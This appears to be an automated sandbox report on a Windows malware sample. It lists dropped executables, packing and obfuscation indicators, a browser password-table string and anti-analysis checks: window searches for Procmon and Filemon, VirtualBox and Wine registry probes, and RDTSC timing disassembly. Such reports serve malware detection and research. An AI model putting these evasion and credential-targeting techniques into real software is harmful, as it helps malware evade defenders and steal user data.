Source: BVGvbpplT8.exe, 00000001.00000003.2256925388.0000000005C08000.00000004.00000800.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2257320735.0000000005BE9000.00000004.00000800.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2286702530.0000000005C0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: BVGvbpplT8.exe Virustotal: Detection: 54%
Source: BVGvbpplT8.exe ReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File read: C:\Users\user\Desktop\BVGvbpplT8.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\BVGvbpplT8.exe "C:\Users\user\Desktop\BVGvbpplT8.exe"
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Process created: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe "C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe"
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Process created: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe "C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe"
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Process created: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe "C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe" Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Process created: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe "C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe" Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: BVGvbpplT8.exe Static file information: File size 1874432 > 1048576
Source: BVGvbpplT8.exe Static PE information: Raw size of xpumokpk is bigger than: 0x100000 < 0x1a1600
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 44WNAJWW05E0258PKFVID8DSXYO93MX.exe, 0000000D.00000002.2650233519.0000000000452000.00000040.00000001.01000000.00000006.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Unpacked PE file: 13.2.44WNAJWW05E0258PKFVID8DSXYO93MX.exe.450000.0.unpack :EW;.rsrc:W;.idata :W;brdofphe:EW;pzoalvov:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Unpacked PE file: 14.2.O215CKAM4VJZ3EV7.exe.450000.0.unpack :EW;.rsrc:W;.idata :W;ynqricro:EW;wjlvyldl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ynqricro:EW;wjlvyldl:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: BVGvbpplT8.exe Static PE information: real checksum: 0x1d56df should be: 0x1cdbd3
Source: O215CKAM4VJZ3EV7.exe.1.dr Static PE information: real checksum: 0x2b4c84 should be: 0x2c0e47
Source: 44WNAJWW05E0258PKFVID8DSXYO93MX.exe.1.dr Static PE information: real checksum: 0x2ac9fa should be: 0x2b1d20
PE file contains sections with non-standard names
Source: BVGvbpplT8.exe Static PE information: section name:
Source: BVGvbpplT8.exe Static PE information: section name: .idata
Source: BVGvbpplT8.exe Static PE information: section name:
Source: BVGvbpplT8.exe Static PE information: section name: xpumokpk
Source: BVGvbpplT8.exe Static PE information: section name: mjjkhxdo
Source: BVGvbpplT8.exe Static PE information: section name: .taggant
Source: 44WNAJWW05E0258PKFVID8DSXYO93MX.exe.1.dr Static PE information: section name:
Source: 44WNAJWW05E0258PKFVID8DSXYO93MX.exe.1.dr Static PE information: section name: .idata
Source: 44WNAJWW05E0258PKFVID8DSXYO93MX.exe.1.dr Static PE information: section name: brdofphe
Source: 44WNAJWW05E0258PKFVID8DSXYO93MX.exe.1.dr Static PE information: section name: pzoalvov
Source: 44WNAJWW05E0258PKFVID8DSXYO93MX.exe.1.dr Static PE information: section name: .taggant
Source: O215CKAM4VJZ3EV7.exe.1.dr Static PE information: section name:
Source: O215CKAM4VJZ3EV7.exe.1.dr Static PE information: section name: .idata
Source: O215CKAM4VJZ3EV7.exe.1.dr Static PE information: section name: ynqricro
Source: O215CKAM4VJZ3EV7.exe.1.dr Static PE information: section name: wjlvyldl
Source: O215CKAM4VJZ3EV7.exe.1.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D6D469 push edi; retf 1_3_00D6D46A
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D6D469 push edi; retf 1_3_00D6D46A
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D6D469 push edi; retf 1_3_00D6D46A
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D6D469 push edi; retf 1_3_00D6D46A
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D6CB88 pushfd ; retf 1_3_00D6CB99
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D6CB88 pushfd ; retf 1_3_00D6CB99
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D6CB88 pushfd ; retf 1_3_00D6CB99
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D6CB88 pushfd ; retf 1_3_00D6CB99
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D07EB0 push FFFFFF82h; ret 1_3_00D07ED2
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D07EB0 push FFFFFF82h; ret 1_3_00D07ED2
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D03F04 push ds; retf 1_3_00D03F16
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D03F04 push ds; retf 1_3_00D03F16
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D6CB88 pushfd ; retf 1_3_00D6CB99
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D6CB88 pushfd ; retf 1_3_00D6CB99
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D6CB88 pushfd ; retf 1_3_00D6CB99
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D6CB88 pushfd ; retf 1_3_00D6CB99
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D6D469 push edi; retf 1_3_00D6D46A
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D6D469 push edi; retf 1_3_00D6D46A
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D6D469 push edi; retf 1_3_00D6D46A
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D6D469 push edi; retf 1_3_00D6D46A
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_05BE006F push cs; iretd 1_3_05BE0070
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_05BDFFC0 push eax; ret 1_3_05BDFFDA
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D6D469 push edi; retf 1_3_00D6D46A
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D6D469 push edi; retf 1_3_00D6D46A
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D6D469 push edi; retf 1_3_00D6D46A
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D6D469 push edi; retf 1_3_00D6D46A
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D6CB88 pushfd ; retf 1_3_00D6CB99
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D6CB88 pushfd ; retf 1_3_00D6CB99
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D6CB88 pushfd ; retf 1_3_00D6CB99
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D6CB88 pushfd ; retf 1_3_00D6CB99
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00D6D469 push edi; retf 1_3_00D6D46A
Source: BVGvbpplT8.exe Static PE information: section name: entropy: 7.983496110315362
Source: BVGvbpplT8.exe Static PE information: section name: xpumokpk entropy: 7.9532772080484335
Drops PE files
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File created: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Jump to dropped file
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File created: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\Desktop\BVGvbpplT8.exe System information queried: FirmwareTableInformation Jump to behavior
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10E7BAF second address: 10E7BB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10E6D0C second address: 10E6D55 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAAF8FC5086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FAAF8FC5098h 0x00000010 jg 00007FAAF8FC5086h 0x00000016 popad 0x00000017 jmp 00007FAAF8FC508Ah 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FAAF8FC5093h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10EA70D second address: 10EA712 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10EA78A second address: 10EA794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FAAF8FC5086h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10EA794 second address: 10EA7E4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 4C4AF8CFh 0x0000000f mov si, di 0x00000012 push 00000003h 0x00000014 or esi, 7B265802h 0x0000001a push 00000000h 0x0000001c mov edi, 7D58BDA5h 0x00000021 mov esi, dword ptr [ebp+122D3726h] 0x00000027 push 00000003h 0x00000029 cmc 0x0000002a push C41C5E5Dh 0x0000002f push eax 0x00000030 push edx 0x00000031 jns 00007FAAF912803Fh 0x00000037 jmp 00007FAAF9128039h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10EA7E4 second address: 10EA816 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF8FC508Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 041C5E5Dh 0x00000010 mov si, D8C1h 0x00000014 lea ebx, dword ptr [ebp+12456645h] 0x0000001a push ebx 0x0000001b mov esi, dword ptr [ebp+122D35FAh] 0x00000021 pop edi 0x00000022 mov edi, dword ptr [ebp+122D2B9Eh] 0x00000028 push eax 0x00000029 push edi 0x0000002a push esi 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10EAA2A second address: 10EAA31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10EAA31 second address: 10EAAD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jno 00007FAAF8FC509Fh 0x0000000e nop 0x0000000f mov si, di 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007FAAF8FC5088h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e push 0D8EAED6h 0x00000033 push edx 0x00000034 jne 00007FAAF8FC5088h 0x0000003a pop edx 0x0000003b xor dword ptr [esp], 0D8EAE56h 0x00000042 push 00000003h 0x00000044 mov si, D867h 0x00000048 push 00000000h 0x0000004a push ebx 0x0000004b and cl, FFFFFFF1h 0x0000004e pop edx 0x0000004f push 00000003h 0x00000051 mov edi, dword ptr [ebp+122D35D2h] 0x00000057 call 00007FAAF8FC5089h 0x0000005c jbe 00007FAAF8FC5098h 0x00000062 pushad 0x00000063 pushad 0x00000064 popad 0x00000065 jmp 00007FAAF8FC508Eh 0x0000006a popad 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e push esi 0x0000006f push edx 0x00000070 pop edx 0x00000071 pop esi 0x00000072 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10EAAD1 second address: 10EAAEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAF9128035h 0x00000009 rdtsc
